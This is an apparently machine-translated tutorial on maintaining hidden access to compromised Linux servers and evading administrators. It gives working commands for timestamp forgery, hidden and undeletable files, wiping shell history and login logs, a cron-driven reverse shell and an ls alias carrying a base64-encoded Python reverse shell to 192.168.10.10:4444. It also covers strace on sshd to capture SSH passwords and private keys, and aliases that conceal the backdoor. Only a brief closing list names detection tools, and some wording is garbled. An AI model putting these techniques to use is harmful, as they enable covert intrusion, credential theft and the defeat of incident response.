Linux permission maintenance—Strace monitoring & Alias alias & Cron scheduled tasks

1 Introduction

  In the previous article, I introduced several ways to maintain permissions. I feel that many methods can be discovered or are obvious, such as the landing time of files. Usually when operation and maintenance personnel see new files, they will look at them. Look, what is written in the file and who created it? If there is only one operation and maintenance personnel, then the probability of being investigated is definitely higher.

  So sometimes you need to properly hide the backdoor you have left.

2. Hiding techniques

  Here we mainly describe some common hiding techniques. As long as the hiding is deep, it will be difficult for operation and maintenance personnel to discover, and the authority will be maintained for a long time.

2.1. Time forgery

  A 1.txt file was created in advance. If we check the time of 1.txt, we can obviously find that it is out of place. If the operation and maintenance personnel see it, they will definitely check this problem. If this is a Trojan horse file, it will be directly Found.

ls -l

2.1.1. Modification time

  Here we will modify the time to be the same as the public folder time. After modification here, we can forge the time.

touch -r 目标时间戳的文件 要修改时间戳的文件 

2.2. Hidden files

  Hidden files mainly rely on daily troubleshooting by operation and maintenance personnel to maintain permissions. Adding a . in front of the Linux system file can hide the file. However, if the operation and maintenance personnel only use ls during troubleshooting, it will be very difficult. Check for hidden files.

  It can be seen that the 1.txt file cannot be viewed directly using ls. You must use ls -la to troubleshoot.

touch .1.txt

2.3. chattr command

  This command is used in Linux systems to lock some important files to prevent them from being deleted. We can use this command to forge to avoid files being deleted. At the same time, it can also fool the operation and maintenance personnel into thinking that they are system files under certain circumstances. So as not to delete it.

2.3.1. Command reference

chattr 参数 文件名
a：让文件或目录仅供附加用途。
b：不更新文件或目录的最后存取时间。
c：将文件或目录压缩后存放。
d：将文件或目录排除在倾倒操作之外。
i：不得任意更动文件或目录。
s：保密性删除文件或目录。
S：即时更新文件或目录。
u：预防意外删除。

2.3.2. Attribute addition

  This is +i, not -i, which is equivalent to adding attributes to the file.

chattr +i 1.txt

2.3.3. Attribute release

  Here, just change the previous +i to -i to access the attributes.

chattr -i 1.txt

2.4. Historical commands

  The history command can query the command execution history. After we execute the Trojan running command, if we do not delete these commands, they will be investigated. At this time, we need to hide the command, that is, not record it.

2.4.1. Hidden commands

  In fact, when executing a command, add a space in front of the command, then the command execution will not be recorded in the history. If this trick does not work in your system, please check whether the environment variable is included. It seems that the centos system does not have it by HISTCONTROLdefault ignorespace. Set this value.

history -c ##清除缓存
echo > ./.bash_history #彻底删除命令

  I won’t demonstrate it here, mainly because I don’t know why these command parameters cannot be executed in Linux.

2.5. Clear login log

  Clearing these logs here can prevent the login IP address and other information from being discovered.

2.5.1. Clear login success log

echo > /var/log/wtmp ##此文件默认打开时乱码，可查到ip等信息
last|grep root ##此时即查不到用户登录信息

2.5.2. Clear login failure log

echo > /var/log/btmp ##此文件默认打开时乱码，可查到登陆失败信息
lastb |grep root ##查不到登陆失败信息

3. Scheduled tasks—cron backdoor

  The cron backdoor mainly uses the system's scheduled task function to implement rebound shells.

3.1. Edit backdoor rebound

  Create a hidden file here, then add the address and port of the rebound shell to the hidden file, and add execution permission to the script.

vim /etc/.backshell.sh

#!/bin/bash
bash -i >& /dev/tcp/192.168.10.10/4444 0>&1

chmod +x /etc/.backshell.sh

3.2. Add scheduled tasks

  Set the script to automatically execute every minute.

vim /etc/crontab
*/1 * * * * root /etc/.backshell.sh

3.3. Check the rebound effect

  Listen to the local port 4444 on the attack machine to wait for the rebound shell to execute.

nc -lvvp 4444

3.4. View traffic

  Here we can go to the target host to check the port connection status, and we can see that there is a connection to port 4444.

netstat -ant

4. Monitoring function—strace backdoor

  straceIt is a powerful Linux debugging analysis and diagnosis tool that can be used to track system calls and signals received when a program is executed, especially for programs whose source code is unreadable or whose source code cannot be recompiled. In Linux systems, user processes cannot directly access computer hardware devices. When a process needs to access a hardware device (such as reading disk files or receiving network data, etc.), it must switch from user mode to kernel mode and access the hardware device through system calls. straceSystem calls generated by a process can be tracked, including parameters, return values, and execution time. If stracethere is no output, it does not mean that the process is blocked at this time; it may also be that the program process is performing something that does not require communication with other parts of the system. straceReceives information from the kernel without building the kernel in any special way.

  And strace can be used as a keylogging backdoor.

4.1. Record sshd plaintext

  Here, the password is recorded first and waits for the user to connect using ssh next time. After the connection, the clear text password will be stored in the directory you set.

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)  ##记录ssh登录密码存储到/tmp/.sshd.log文件中。

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log  ##查看这个文件。

  The purpose of using filtering here to find the password is to find the password in more aspects. Otherwise, you can take a look. There are a lot of contents in the file that are logged in once, and it is difficult to find it with the naked eye.

4.2. Record sshd private key

(strace -f -F -p ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'} -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)  ##这里也是同样的记录私钥到该文件中。

grep ‘PRIVATE KEY’ /tmp/.sshd.log  ##读取私钥。

4.3. Questions

  A big problem with this command file is that it will always record the logged-in byte stream. You can check the file. The file will become larger and larger. Therefore, in a real environment, it is better to use this method less to avoid file errors. Excessive occupancy will cause the hard disk to alarm and be discovered.

ls -al /tmp/.sshd.log

5. Command customization-Alias ​​backdoor

  Alias ​​is mainly used to set aliases for commands in Linux. For example, you can use alias when you set ls equal to ls -al.

5.1. Basic demonstration

  You can see that the original ls only displays some basic content, but after setting the alias, the execution effect of ls -al will appear.

alias ls='ls -al'  ##设置别名
unalias ls   ##删除别名

5.2. Basic rebound

  Here, modify the rebound shell address and port, and wait for the operation and maintenance personnel to enter the ls command.

#将ls设置为反弹shell
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.10.10/4444 0>&1; };alerts'

5.2.1. Check the effect

  You can see that there is a successful rebound here.

nc -lvvp 4444

5.2.2. Problem

  After executing ls here, the command will be successfully executed, but there is a big problem that the ls command will be stuck and cannot be operated. Only the attacker ends the session can it be restored.

5.3. Advanced version rebound

  This is actually calling the python module to execute, using the socket to bounce a shell. At the same time, bash64 is used for encryption. When it is modified, you can modify the IP address and port in the ciphertext to your own.

alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMCIsIDQ0NDQpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp=='\'')))";};alerts'

5.3.1. Execute commands

  Here, the command alias is bound to the ls command. There may be a small problem here. Python3 is not installed on some systems, so I will not test it.

5.3.2. Check the effect

  You can see that it has indeed bounced back, but it is using python and python3 is not specified, so after it bounces back, the command cannot be executed.

nc -lvvp 4444

5.3.3. Problem

  The final problem here is that there is a Python version problem. At the same time, if the operation and maintenance personnel have set the alias of the ls command, then if you modify it, it will definitely be discovered. At the same time, this method will no longer take effect after restarting.

5.4. Sustainability

  This is to ensure that the system can still take effect after restarting.

5.4.1. Modify files

vim /etc/upload  #将下面的三个后门命令写入
alias ls='alerts(){ ls $* --color=auto;python -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'\''UTF-8'\'')}[sys.version_info[0]]('\''aW1wb3J0IG9zLHNvY2tldCxzdWJwcm9jZXNzOwpyZXQgPSBvcy5mb3JrKCkKaWYgcmV0ID4gMDoKICAgIGV4aXQoKQplbHNlOgogICAgdHJ5OgogICAgICAgIHMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pCiAgICAgICAgcy5jb25uZWN0KCgiMTkyLjE2OC4xMC4xMCIsIDQ0NDQpKQogICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgMCkKICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksIDEpCiAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAyKQogICAgICAgIHAgPSBzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwgIi1pIl0pCiAgICBleGNlcHQgRXhjZXB0aW9uIGFzIGU6CiAgICAgICAgZXhpdCgp=='\'')))";};alerts'

alias unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'

alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts'

vim ~/.bashrc
#在最后面写入
if [ -f /etc/upload ]; then
	. /etc/upload
fi

5.4.2. Check the effect

  No success.

nc -lvvp 4444

6. Kernel loads LKM-Rootkit backdoor

  Under normal circumstances, most Linux backdoors use msf to establish connections, but these connections will be discovered by operation and maintenance personnel, so we want to have a backdoor with non-tcp connections and traffic that is not easily suspected, and in a scenario with a large number of shells , can manage the shell, Reptile happens to be a kind of LKM rootkit, so it has good concealment and powerful functions.

  reptile

  Use reference

  Regarding this, I was planning to write it at first, but I found that the kernel version of so many servers did not meet the testing scope of this tool. I was too lazy to find a local image. In the meantime, I could take a look at the methods written by other authors. This tool was discontinued in 2020. I guess how long you have been a user.

7. Linux detection tools

  This program is designed to provide convenience for security emergency response personnel when troubleshooting Linux hosts, to achieve automatic and comprehensive detection of the host-side Checklist, and to automatically aggregate data based on the detection results to trace the source of hacker attack paths.

  Under Linux platform: chkrootkit, rkhunter, OSSEC, zeppoo, etc.

  Under Windows platform: BlackLight, RootkitRevealer, Rootkit Hook Analyzer

  GScan